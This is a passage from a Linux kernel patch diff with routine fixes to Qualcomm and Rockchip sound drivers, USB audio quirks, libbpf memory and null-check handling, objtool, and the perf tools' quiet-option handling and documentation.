+-	select SND_SOC_QCOM_COMMON
++	depends on SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7280
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_WCD938X_SDW
+diff --git a/sound/soc/qcom/common.c b/sound/soc/qcom/common.c
+index 69dd3b504e209..49c74c1662a3f 100644
+--- a/sound/soc/qcom/common.c
++++ b/sound/soc/qcom/common.c
+@@ -180,7 +180,6 @@ err_put_np:
+ }
+ EXPORT_SYMBOL_GPL(qcom_snd_parse_of);
+ 
+-#if IS_ENABLED(CONFIG_SOUNDWIRE)
+ int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+ 			 struct sdw_stream_runtime *sruntime,
+ 			 bool *stream_prepared)
+@@ -294,7 +293,6 @@ int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_free);
+-#endif
+ 
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup)
+diff --git a/sound/soc/qcom/common.h b/sound/soc/qcom/common.h
+index c5472a642de08..3ef5bb6d12df7 100644
+--- a/sound/soc/qcom/common.h
++++ b/sound/soc/qcom/common.h
+@@ -11,7 +11,6 @@ int qcom_snd_parse_of(struct snd_soc_card *card);
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup);
+ 
+-#if IS_ENABLED(CONFIG_SOUNDWIRE)
+ int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+ 			 struct sdw_stream_runtime *runtime,
+ 			 bool *stream_prepared);
+@@ -21,26 +20,4 @@ int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+ int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+ 			 struct sdw_stream_runtime *sruntime,
+ 			 bool *stream_prepared);
+-#else
+-static inline int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+-				       struct sdw_stream_runtime *runtime,
+-				       bool *stream_prepared)
+-{
+-	return -ENOTSUPP;
+-}
+-
+-static inline int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+-					 struct snd_pcm_hw_params *params,
+-					 struct sdw_stream_runtime **psruntime)
+-{
+-	return -ENOTSUPP;
+-}
+-
+-static inline int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+-				       struct sdw_stream_runtime *sruntime,
+-				       bool *stream_prepared)
+-{
+-	return -ENOTSUPP;
+-}
+-#endif
+ #endif
+diff --git a/sound/soc/qcom/lpass-sc7180.c b/sound/soc/qcom/lpass-sc7180.c
+index 77a556b27cf09..24a1c121cb2e9 100644
+--- a/sound/soc/qcom/lpass-sc7180.c
++++ b/sound/soc/qcom/lpass-sc7180.c
+@@ -131,6 +131,9 @@ static int sc7180_lpass_init(struct platform_device *pdev)
+ 
+ 	drvdata->clks = devm_kcalloc(dev, variant->num_clks,
+ 				     sizeof(*drvdata->clks), GFP_KERNEL);
++	if (!drvdata->clks)
++		return -ENOMEM;
++
+ 	drvdata->num_clks = variant->num_clks;
+ 
+ 	for (i = 0; i < drvdata->num_clks; i++)
+diff --git a/sound/soc/rockchip/rockchip_pdm.c b/sound/soc/rockchip/rockchip_pdm.c
+index a7549f8272359..5b1e47bdc376b 100644
+--- a/sound/soc/rockchip/rockchip_pdm.c
++++ b/sound/soc/rockchip/rockchip_pdm.c
+@@ -431,6 +431,7 @@ static int rockchip_pdm_runtime_resume(struct device *dev)
+ 
+ 	ret = clk_prepare_enable(pdm->hclk);
+ 	if (ret) {
++		clk_disable_unprepare(pdm->clk);
+ 		dev_err(pdm->dev, "hclock enable failed %d\n", ret);
+ 		return ret;
+ 	}
+diff --git a/sound/soc/rockchip/rockchip_spdif.c b/sound/soc/rockchip/rockchip_spdif.c
+index 8bef572d3cbc1..5b4f004575879 100644
+--- a/sound/soc/rockchip/rockchip_spdif.c
++++ b/sound/soc/rockchip/rockchip_spdif.c
+@@ -88,6 +88,7 @@ static int __maybe_unused rk_spdif_runtime_resume(struct device *dev)
+ 
+ 	ret = clk_prepare_enable(spdif->hclk);
+ 	if (ret) {
++		clk_disable_unprepare(spdif->mclk);
+ 		dev_err(spdif->dev, "hclk clock enable failed %d\n", ret);
+ 		return ret;
+ 	}
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 310cd6fb0038a..4aaf0784940b5 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -1673,6 +1673,13 @@ void snd_usb_endpoint_stop(struct snd_usb_endpoint *ep, bool keep_pending)
+ 		stop_urbs(ep, false, keep_pending);
+ 		if (ep->clock_ref)
+ 			atomic_dec(&ep->clock_ref->locked);
++
++		if (ep->chip->quirk_flags & QUIRK_FLAG_FORCE_IFACE_RESET &&
++		    usb_pipeout(ep->pipe)) {
++			ep->need_prepare = true;
++			if (ep->iface_ref)
++				ep->iface_ref->need_setup = true;
++		}
+ 	}
+ }
+ 
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 8ed165f036a01..9557bd4d1bbca 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -604,6 +604,7 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 	struct snd_usb_substream *subs = runtime->private_data;
+ 	struct snd_usb_audio *chip = subs->stream->chip;
++	int retry = 0;
+ 	int ret;
+ 
+ 	ret = snd_usb_lock_shutdown(chip);
+@@ -614,6 +615,7 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 		goto unlock;
+ 	}
+ 
++ again:
+ 	if (subs->sync_endpoint) {
+ 		ret = snd_usb_endpoint_prepare(chip, subs->sync_endpoint);
+ 		if (ret < 0)
+@@ -638,9 +640,16 @@ static int snd_usb_pcm_prepare(struct snd_pcm_substream *substream)
+ 
+ 	subs->lowlatency_playback = lowlatency_playback_available(runtime, subs);
+ 	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK &&
+-	    !subs->lowlatency_playback)
++	    !subs->lowlatency_playback) {
+ 		ret = start_endpoints(subs);
+-
++		/* if XRUN happens at starting streams (possibly with implicit
++		 * fb case), restart again, but only try once.
++		 */
++		if (ret == -EPIPE && !retry++) {
++			sync_pending_stops(subs);
++			goto again;
++		}
++	}
+  unlock:
+ 	snd_usb_unlock_shutdown(chip);
+ 	return ret;
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 874fcf245747f..271884e350035 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -76,6 +76,8 @@
+ { USB_DEVICE_VENDOR_SPEC(0x041e, 0x3f0a) },
+ /* E-Mu 0204 USB */
+ { USB_DEVICE_VENDOR_SPEC(0x041e, 0x3f19) },
++/* Ktmicro Usb_audio device */
++{ USB_DEVICE_VENDOR_SPEC(0x31b2, 0x0011) },
+ 
+ /*
+  * Creative Technology, Ltd Live! Cam Sync HD [VF0770]
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 0f4dd3503a6a9..58b37bfc885cb 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2044,6 +2044,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 	DEVICE_FLG(0x0644, 0x804a, /* TEAC UD-301 */
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY |
+ 		   QUIRK_FLAG_IFACE_DELAY),
++	DEVICE_FLG(0x0644, 0x805f, /* TEAC Model 12 */
++		   QUIRK_FLAG_FORCE_IFACE_RESET),
+ 	DEVICE_FLG(0x06f8, 0xb000, /* Hercules DJ Console (Windows Edition) */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x06f8, 0xd002, /* Hercules DJ Console (Macintosh Edition) */
+diff --git a/sound/usb/usbaudio.h b/sound/usb/usbaudio.h
+index e97141ef730ad..2aba508a48312 100644
+--- a/sound/usb/usbaudio.h
++++ b/sound/usb/usbaudio.h
+@@ -172,6 +172,9 @@ extern bool snd_usb_skip_validation;
+  *  Don't apply implicit feedback sync mode
+  * QUIRK_FLAG_IFACE_SKIP_CLOSE
+  *  Don't closed interface during setting sample rate
++ * QUIRK_FLAG_FORCE_IFACE_RESET
++ *  Force an interface reset whenever stopping & restarting a stream
++ *  (e.g. after xrun)
+  */
+ 
+ #define QUIRK_FLAG_GET_SAMPLE_RATE	(1U << 0)
+@@ -194,5 +197,6 @@ extern bool snd_usb_skip_validation;
+ #define QUIRK_FLAG_GENERIC_IMPLICIT_FB	(1U << 17)
+ #define QUIRK_FLAG_SKIP_IMPLICIT_FB	(1U << 18)
+ #define QUIRK_FLAG_IFACE_SKIP_CLOSE	(1U << 19)
++#define QUIRK_FLAG_FORCE_IFACE_RESET	(1U << 20)
+ 
+ #endif /* __USBAUDIO_H */
+diff --git a/tools/bpf/bpftool/common.c b/tools/bpf/bpftool/common.c
+index 0cdb4f7115101..e7a11cff7245a 100644
+--- a/tools/bpf/bpftool/common.c
++++ b/tools/bpf/bpftool/common.c
+@@ -499,6 +499,7 @@ static int do_build_table_cb(const char *fpath, const struct stat *sb,
+ 	if (err) {
+ 		p_err("failed to append entry to hashmap for ID %u, path '%s': %s",
+ 		      pinned_info.id, path, strerror(errno));
++		free(path);
+ 		goto out_close;
+ 	}
+ 
+diff --git a/tools/lib/bpf/bpf.h b/tools/lib/bpf/bpf.h
+index 9c50beabdd145..fddc05c667b5d 100644
+--- a/tools/lib/bpf/bpf.h
++++ b/tools/lib/bpf/bpf.h
+@@ -393,8 +393,15 @@ LIBBPF_API int bpf_task_fd_query(int pid, int fd, __u32 flags, char *buf,
+ 				 __u32 *buf_len, __u32 *prog_id, __u32 *fd_type,
+ 				 __u64 *probe_offset, __u64 *probe_addr);
+ 
++#ifdef __cplusplus
++/* forward-declaring enums in C++ isn't compatible with pure C enums, so
++ * instead define bpf_enable_stats() as accepting int as an input
++ */
++LIBBPF_API int bpf_enable_stats(int type);
++#else
+ enum bpf_stats_type; /* defined in up-to-date linux/bpf.h */
+ LIBBPF_API int bpf_enable_stats(enum bpf_stats_type type);
++#endif
+ 
+ struct bpf_prog_bind_opts {
+ 	size_t sz; /* size of this struct for forward/backward compatibility */
+diff --git a/tools/lib/bpf/btf.c b/tools/lib/bpf/btf.c
+index d88647da2c7fc..675a0df5c840f 100644
+--- a/tools/lib/bpf/btf.c
++++ b/tools/lib/bpf/btf.c
+@@ -3887,14 +3887,14 @@ static inline __u16 btf_fwd_kind(struct btf_type *t)
+ }
+ 
+ /* Check if given two types are identical ARRAY definitions */
+-static int btf_dedup_identical_arrays(struct btf_dedup *d, __u32 id1, __u32 id2)
++static bool btf_dedup_identical_arrays(struct btf_dedup *d, __u32 id1, __u32 id2)
+ {
+ 	struct btf_type *t1, *t2;
+ 
+ 	t1 = btf_type_by_id(d->btf, id1);
+ 	t2 = btf_type_by_id(d->btf, id2);
+ 	if (!btf_is_array(t1) || !btf_is_array(t2))
+-		return 0;
++		return false;
+ 
+ 	return btf_equal_array(t1, t2);
+ }
+@@ -3918,7 +3918,9 @@ static bool btf_dedup_identical_structs(struct btf_dedup *d, __u32 id1, __u32 id
+ 	m1 = btf_members(t1);
+ 	m2 = btf_members(t2);
+ 	for (i = 0, n = btf_vlen(t1); i < n; i++, m1++, m2++) {
+-		if (m1->type != m2->type)
++		if (m1->type != m2->type &&
++		    !btf_dedup_identical_arrays(d, m1->type, m2->type) &&
++		    !btf_dedup_identical_structs(d, m1->type, m2->type))
+ 			return false;
+ 	}
+ 	return true;
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 3937f66c7f8d6..0b470169729e6 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -219,6 +219,17 @@ static int btf_dump_resize(struct btf_dump *d)
+ 	return 0;
+ }
+ 
++static void btf_dump_free_names(struct hashmap *map)
++{
++	size_t bkt;
++	struct hashmap_entry *cur;
++
++	hashmap__for_each_entry(map, cur, bkt)
++		free((void *)cur->key);
++
++	hashmap__free(map);
++}
++
+ void btf_dump__free(struct btf_dump *d)
+ {
+ 	int i;
+@@ -237,8 +248,8 @@ void btf_dump__free(struct btf_dump *d)
+ 	free(d->cached_names);
+ 	free(d->emit_queue);
+ 	free(d->decl_stack);
+-	hashmap__free(d->type_names);
+-	hashmap__free(d->ident_names);
++	btf_dump_free_names(d->type_names);
++	btf_dump_free_names(d->ident_names);
+ 
+ 	free(d);
+ }
+@@ -1520,11 +1531,23 @@ static void btf_dump_emit_type_cast(struct btf_dump *d, __u32 id,
+ static size_t btf_dump_name_dups(struct btf_dump *d, struct hashmap *name_map,
+ 				 const char *orig_name)
+ {
++	char *old_name, *new_name;
+ 	size_t dup_cnt = 0;
++	int err;
++
++	new_name = strdup(orig_name);
++	if (!new_name)
++		return 1;
+ 
+ 	hashmap__find(name_map, orig_name, (void **)&dup_cnt);
+ 	dup_cnt++;
+-	hashmap__set(name_map, orig_name, (void *)dup_cnt, NULL, NULL);
++
++	err = hashmap__set(name_map, new_name, (void *)dup_cnt,
++			   (const void **)&old_name, NULL);
++	if (err)
++		free(new_name);
++
++	free(old_name);
+ 
+ 	return dup_cnt;
+ }
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index 91b7106a4a735..b9a29d1053765 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -597,7 +597,7 @@ struct elf_state {
+ 	size_t shstrndx; /* section index for section name strings */
+ 	size_t strtabidx;
+ 	struct elf_sec_desc *secs;
+-	int sec_cnt;
++	size_t sec_cnt;
+ 	int btf_maps_shndx;
+ 	__u32 btf_maps_sec_btf_id;
+ 	int text_shndx;
+@@ -1408,6 +1408,10 @@ static int bpf_object__check_endianness(struct bpf_object *obj)
+ static int
+ bpf_object__init_license(struct bpf_object *obj, void *data, size_t size)
+ {
++	if (!data) {
++		pr_warn("invalid license section in %s\n", obj->path);
++		return -LIBBPF_ERRNO__FORMAT;
++	}
+ 	/* libbpf_strlcpy() only copies first N - 1 bytes, so size + 1 won't
+ 	 * go over allowed ELF data section buffer
+ 	 */
+@@ -1421,7 +1425,7 @@ bpf_object__init_kversion(struct bpf_object *obj, void *data, size_t size)
+ {
+ 	__u32 kver;
+ 
+-	if (size != sizeof(kver)) {
++	if (!data || size != sizeof(kver)) {
+ 		pr_warn("invalid kver section in %s\n", obj->path);
+ 		return -LIBBPF_ERRNO__FORMAT;
+ 	}
+@@ -3312,10 +3316,15 @@ static int bpf_object__elf_collect(struct bpf_object *obj)
+ 	Elf64_Shdr *sh;
+ 
+ 	/* ELF section indices are 0-based, but sec #0 is special "invalid"
+-	 * section. e_shnum does include sec #0, so e_shnum is the necessary
+-	 * size of an array to keep all the sections.
++	 * section. Since section count retrieved by elf_getshdrnum() does
++	 * include sec #0, it is already the necessary size of an array to keep
++	 * all the sections.
+ 	 */
+-	obj->efile.sec_cnt = obj->efile.ehdr->e_shnum;
++	if (elf_getshdrnum(obj->efile.elf, &obj->efile.sec_cnt)) {
++		pr_warn("elf: failed to get the number of sections for %s: %s\n",
++			obj->path, elf_errmsg(-1));
++		return -LIBBPF_ERRNO__FORMAT;
++	}
+ 	obj->efile.secs = calloc(obj->efile.sec_cnt, sizeof(*obj->efile.secs));
+ 	if (!obj->efile.secs)
+ 		return -ENOMEM;
+@@ -4106,6 +4115,9 @@ static struct bpf_program *find_prog_by_sec_insn(const struct bpf_object *obj,
+ 	int l = 0, r = obj->nr_programs - 1, m;
+ 	struct bpf_program *prog;
+ 
++	if (!obj->nr_programs)
++		return NULL;
++
+ 	while (l < r) {
+ 		m = l + (r - l + 1) / 2;
+ 		prog = &obj->programs[m];
+diff --git a/tools/lib/bpf/usdt.c b/tools/lib/bpf/usdt.c
+index e83b497c22454..49f3c3b7f6095 100644
+--- a/tools/lib/bpf/usdt.c
++++ b/tools/lib/bpf/usdt.c
+@@ -1348,25 +1348,23 @@ static int calc_pt_regs_off(const char *reg_name)
+ 
+ static int parse_usdt_arg(const char *arg_str, int arg_num, struct usdt_arg_spec *arg)
+ {
+-	char *reg_name = NULL;
++	char reg_name[16];
+ 	int arg_sz, len, reg_off;
+ 	long off;
+ 
+-	if (sscanf(arg_str, " %d @ \[ %m[a-z0-9], %ld ] %n", &arg_sz, &reg_name, &off, &len) == 3) {
++	if (sscanf(arg_str, " %d @ \[ %15[a-z0-9], %ld ] %n", &arg_sz, reg_name, &off, &len) == 3) {
+ 		/* Memory dereference case, e.g., -4@[sp, 96] */
+ 		arg->arg_type = USDT_ARG_REG_DEREF;
+ 		arg->val_off = off;
+ 		reg_off = calc_pt_regs_off(reg_name);
+-		free(reg_name);
+ 		if (reg_off < 0)
+ 			return reg_off;
+ 		arg->reg_off = reg_off;
+-	} else if (sscanf(arg_str, " %d @ \[ %m[a-z0-9] ] %n", &arg_sz, &reg_name, &len) == 2) {
++	} else if (sscanf(arg_str, " %d @ \[ %15[a-z0-9] ] %n", &arg_sz, reg_name, &len) == 2) {
+ 		/* Memory dereference case, e.g., -4@[sp] */
+ 		arg->arg_type = USDT_ARG_REG_DEREF;
+ 		arg->val_off = 0;
+ 		reg_off = calc_pt_regs_off(reg_name);
+-		free(reg_name);
+ 		if (reg_off < 0)
+ 			return reg_off;
+ 		arg->reg_off = reg_off;
+@@ -1375,12 +1373,11 @@ static int parse_usdt_arg(const char *arg_str, int arg_num, struct usdt_arg_spec
+ 		arg->arg_type = USDT_ARG_CONST;
+ 		arg->val_off = off;
+ 		arg->reg_off = 0;
+-	} else if (sscanf(arg_str, " %d @ %m[a-z0-9] %n", &arg_sz, &reg_name, &len) == 2) {
++	} else if (sscanf(arg_str, " %d @ %15[a-z0-9] %n", &arg_sz, reg_name, &len) == 2) {
+ 		/* Register read case, e.g., -8@x4 */
+ 		arg->arg_type = USDT_ARG_REG;
+ 		arg->val_off = 0;
+ 		reg_off = calc_pt_regs_off(reg_name);
+-		free(reg_name);
+ 		if (reg_off < 0)
+ 			return reg_off;
+ 		arg->reg_off = reg_off;
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 43ec14c29a60c..a7f1e6c8bb0a7 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -999,6 +999,16 @@ static const char *uaccess_safe_builtin[] = {
+ 	"__tsan_read_write4",
+ 	"__tsan_read_write8",
+ 	"__tsan_read_write16",
++	"__tsan_volatile_read1",
++	"__tsan_volatile_read2",
++	"__tsan_volatile_read4",
++	"__tsan_volatile_read8",
++	"__tsan_volatile_read16",
++	"__tsan_volatile_write1",
++	"__tsan_volatile_write2",
++	"__tsan_volatile_write4",
++	"__tsan_volatile_write8",
++	"__tsan_volatile_write16",
+ 	"__tsan_atomic8_load",
+ 	"__tsan_atomic16_load",
+ 	"__tsan_atomic32_load",
+diff --git a/tools/perf/Documentation/perf-annotate.txt b/tools/perf/Documentation/perf-annotate.txt
+index 18fcc52809fbf..980fe2c292752 100644
+--- a/tools/perf/Documentation/perf-annotate.txt
++++ b/tools/perf/Documentation/perf-annotate.txt
+@@ -41,7 +41,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message.  (Suppress -v)
++	Do not show any warnings or messages.  (Suppress -v)
+ 
+ -n::
+ --show-nr-samples::
+diff --git a/tools/perf/Documentation/perf-diff.txt b/tools/perf/Documentation/perf-diff.txt
+index be65bd55ab2aa..f3067a4af2940 100644
+--- a/tools/perf/Documentation/perf-diff.txt
++++ b/tools/perf/Documentation/perf-diff.txt
+@@ -75,7 +75,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message.  (Suppress -v)
++	Do not show any warnings or messages.  (Suppress -v)
+ 
+ -f::
+ --force::
+diff --git a/tools/perf/Documentation/perf-lock.txt b/tools/perf/Documentation/perf-lock.txt
+index 3b1e16563b795..4958a1ffa1cca 100644
+--- a/tools/perf/Documentation/perf-lock.txt
++++ b/tools/perf/Documentation/perf-lock.txt
+@@ -42,7 +42,7 @@ COMMON OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message. (Suppress -v)
++	Do not show any warnings or messages. (Suppress -v)
+ 
+ -D::
+ --dump-raw-trace::
+diff --git a/tools/perf/Documentation/perf-probe.txt b/tools/perf/Documentation/perf-probe.txt
+index 080981d38d7ba..7f8e8ba3a7872 100644
+--- a/tools/perf/Documentation/perf-probe.txt
++++ b/tools/perf/Documentation/perf-probe.txt
+@@ -57,7 +57,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Be quiet (do not show any messages including errors).
++	Do not show any warnings or messages.
+ 	Can not use with -v.
+ 
+ -a::
+diff --git a/tools/perf/Documentation/perf-record.txt b/tools/perf/Documentation/perf-record.txt
+index e41ae950fdc3b..9ea6d44aca58c 100644
+--- a/tools/perf/Documentation/perf-record.txt
++++ b/tools/perf/Documentation/perf-record.txt
+@@ -282,7 +282,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Don't print any message, useful for scripting.
++	Don't print any warnings or messages, useful for scripting.
+ 
+ -v::
+ --verbose::
+diff --git a/tools/perf/Documentation/perf-report.txt b/tools/perf/Documentation/perf-report.txt
+index 4533db2ee56bb..4fa509b159489 100644
+--- a/tools/perf/Documentation/perf-report.txt
++++ b/tools/perf/Documentation/perf-report.txt
+@@ -27,7 +27,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message.  (Suppress -v)
++	Do not show any warnings or messages.  (Suppress -v)
+ 
+ -n::
+ --show-nr-samples::
+diff --git a/tools/perf/Documentation/perf-stat.txt b/tools/perf/Documentation/perf-stat.txt
+index d7ff1867feda6..18abdc1dce055 100644
+--- a/tools/perf/Documentation/perf-stat.txt
++++ b/tools/perf/Documentation/perf-stat.txt
+@@ -354,8 +354,8 @@ forbids the event merging logic from sharing events between groups and
+ may be used to increase accuracy in this case.
+ 
+ --quiet::
+-Don't print output. This is useful with perf stat record below to only
+-write data to the perf.data file.
++Don't print output, warnings or messages. This is useful with perf stat
++record below to only write data to the perf.data file.
+ 
+ STAT RECORD
+ -----------
+diff --git a/tools/perf/bench/numa.c b/tools/perf/bench/numa.c
+index e78dedf9e682c..9717c6c17433c 100644
+--- a/tools/perf/bench/numa.c
++++ b/tools/perf/bench/numa.c
+@@ -16,6 +16,7 @@
+ #include <sched.h>
+ #include <stdio.h>
+ #include <assert.h>
++#include <debug.h>
+ #include <malloc.h>
+ #include <signal.h>
+ #include <stdlib.h>
+@@ -116,7 +117,6 @@ struct params {
+ 	long			bytes_thread;
+ 
+ 	int			nr_tasks;
+-	bool			show_quiet;
+ 
+ 	bool			show_convergence;
+ 	bool			measure_convergence;
+@@ -197,7 +197,8 @@ static const struct option options[] = {
+ 	OPT_BOOLEAN('c', "show_convergence", &p0.show_convergence, "show convergence details, "
+ 		    "convergence is reached when each process (all its threads) is running on a single NUMA node."),
+ 	OPT_BOOLEAN('m', "measure_convergence",	&p0.measure_convergence, "measure convergence latency"),
+-	OPT_BOOLEAN('q', "quiet"	, &p0.show_quiet,	"quiet mode"),
++	OPT_BOOLEAN('q', "quiet"	, &quiet,
++		    "quiet mode (do not show any warnings or messages)"),
+ 	OPT_BOOLEAN('S', "serialize-startup", &p0.serialize_startup,"serialize thread startup"),
+ 
+ 	/* Special option string parsing callbacks: */
+@@ -1474,7 +1475,7 @@ static int init(void)
+ 	/* char array in count_process_nodes(): */
+ 	BUG_ON(g->p.nr_nodes < 0);
+ 
+-	if (g->p.show_quiet && !g->p.show_details)
++	if (quiet && !g->p.show_details)
+ 		g->p.show_details = -1;
+ 
+ 	/* Some memory should be specified: */
+@@ -1553,7 +1554,7 @@ static void print_res(const char *name, double val,
+ 	if (!name)
+ 		name = "main,";
+ 
+-	if (!g->p.show_quiet)
++	if (!quiet)
+ 		printf(" %-30s %15.3f, %-15s %s\n", name, val, txt_unit, txt_short);
+ 	else
+ 		printf(" %14.3f %s\n", val, txt_long);
+diff --git a/tools/perf/builtin-annotate.c b/tools/perf/builtin-annotate.c
+index f839e69492e80..517d928c00e3f 100644
+--- a/tools/perf/builtin-annotate.c
++++ b/tools/perf/builtin-annotate.c
+@@ -525,7 +525,7 @@ int cmd_annotate(int argc, const char **argv)
+ 	OPT_BOOLEAN('f', "force", &data.force, "don't complain, do it"),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "do now show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "do now show any warnings or messages"),
+ 	OPT_BOOLEAN('D', "dump-raw-trace", &dump_trace,
+ 		    "dump raw trace in ASCII"),
+ #ifdef HAVE_GTK2_SUPPORT
+diff --git a/tools/perf/builtin-diff.c b/tools/perf/builtin-diff.c
+index d925096dd7f02..ed07cc6cca56c 100644
+--- a/tools/perf/builtin-diff.c
++++ b/tools/perf/builtin-diff.c
+@@ -1260,7 +1260,7 @@ static const char * const diff_usage[] = {
+ static const struct option options[] = {
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any warnings or messages"),
+ 	OPT_BOOLEAN('b', "baseline-only", &show_baseline_only,
+ 		    "Show only items with match in baseline"),
+ 	OPT_CALLBACK('c', "compute", &compute,
+diff --git a/tools/perf/builtin-lock.c b/tools/perf/builtin-lock.c
+index 9722d4ab2e557..66520712a1675 100644
+--- a/tools/perf/builtin-lock.c
++++ b/tools/perf/builtin-lock.c
+@@ -1869,7 +1869,7 @@ int cmd_lock(int argc, const char **argv)
+ 		   "file", "vmlinux pathname"),
+ 	OPT_STRING(0, "kallsyms", &symbol_conf.kallsyms_name,
+ 		   "file", "kallsyms pathname"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any warnings or messages"),
+ 	OPT_END()
+ 	};
+ 
+diff --git a/tools/perf/builtin-probe.c b/tools/perf/builtin-probe.c
+index f62298f5db3b4..ed73d0b89ca2d 100644
+--- a/tools/perf/builtin-probe.c
++++ b/tools/perf/builtin-probe.c
+@@ -40,7 +40,6 @@ static struct {
+ 	int command;	/* Command short_name */
+ 	bool list_events;
+ 	bool uprobes;
+-	bool quiet;
+ 	bool target_used;
+ 	int nevents;
+ 	struct perf_probe_event events[MAX_PROBES];
+@@ -514,8 +513,8 @@ __cmd_probe(int argc, const char **argv)
+ 	struct option options[] = {
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show parsed arguments, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &params.quiet,
+-		    "be quiet (do not show any messages)"),
++	OPT_BOOLEAN('q', "quiet", &quiet,
++		    "be quiet (do not show any warnings or messages)"),
+ 	OPT_CALLBACK_DEFAULT('l', "list", NULL, "[GROUP:]EVENT",
+ 			     "list up probe events",
+ 			     opt_set_filter_with_command, DEFAULT_LIST_FILTER),
+@@ -613,6 +612,15 @@ __cmd_probe(int argc, const char **argv)
+ 
+ 	argc = parse_options(argc, argv, options, probe_usage,
+ 			     PARSE_OPT_STOP_AT_NON_OPTION);
++
++	if (quiet) {
++		if (verbose != 0) {
++			pr_err("  Error: -v and -q are exclusive.\n");
++			return -EINVAL;
++		}
++		verbose = -1;
++	}
++
+ 	if (argc > 0) {
+ 		if (strcmp(argv[0], "-") == 0) {
+ 			usage_with_options_msg(probe_usage, options,
+@@ -634,14 +642,6 @@ __cmd_probe(int argc, const char **argv)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (params.quiet) {
+-		if (verbose != 0) {
+-			pr_err("  Error: -v and -q are exclusive.\n");
+-			return -EINVAL;
+-		}
+-		verbose = -1;
+-	}
+-
+ 	if (probe_conf.max_probes == 0)
+ 		probe_conf.max_probes = MAX_PROBES;
+ 
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index e128b855dddec..59f3d98a0196d 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -3388,7 +3388,7 @@ static struct option __record_options[] = {
+ 		     &record_parse_callchain_opt),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show counter open errors, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "don't print any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "don't print any warnings or messages"),
+ 	OPT_BOOLEAN('s', "stat", &record.opts.inherit_stat,
+ 		    "per thread counts"),
+ 	OPT_BOOLEAN('d', "data", &record.opts.sample_address, "Record the sample addresses"),
+diff --git a/tools/perf/builtin-report.c b/tools/perf/builtin-report.c
+index 8361890176c23..b6d77d3da64f6 100644
+--- a/tools/perf/builtin-report.c
++++ b/tools/perf/builtin-report.c
+@@ -1222,7 +1222,7 @@ int cmd_report(int argc, const char **argv)
+ 		    "input file name"),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any warnings or messages"),
+ 	OPT_BOOLEAN('D', "dump-raw-trace", &dump_trace,
+ 		    "dump raw trace in ASCII"),
+ 	OPT_BOOLEAN(0, "stats", &report.stats_mode, "Display event stats"),
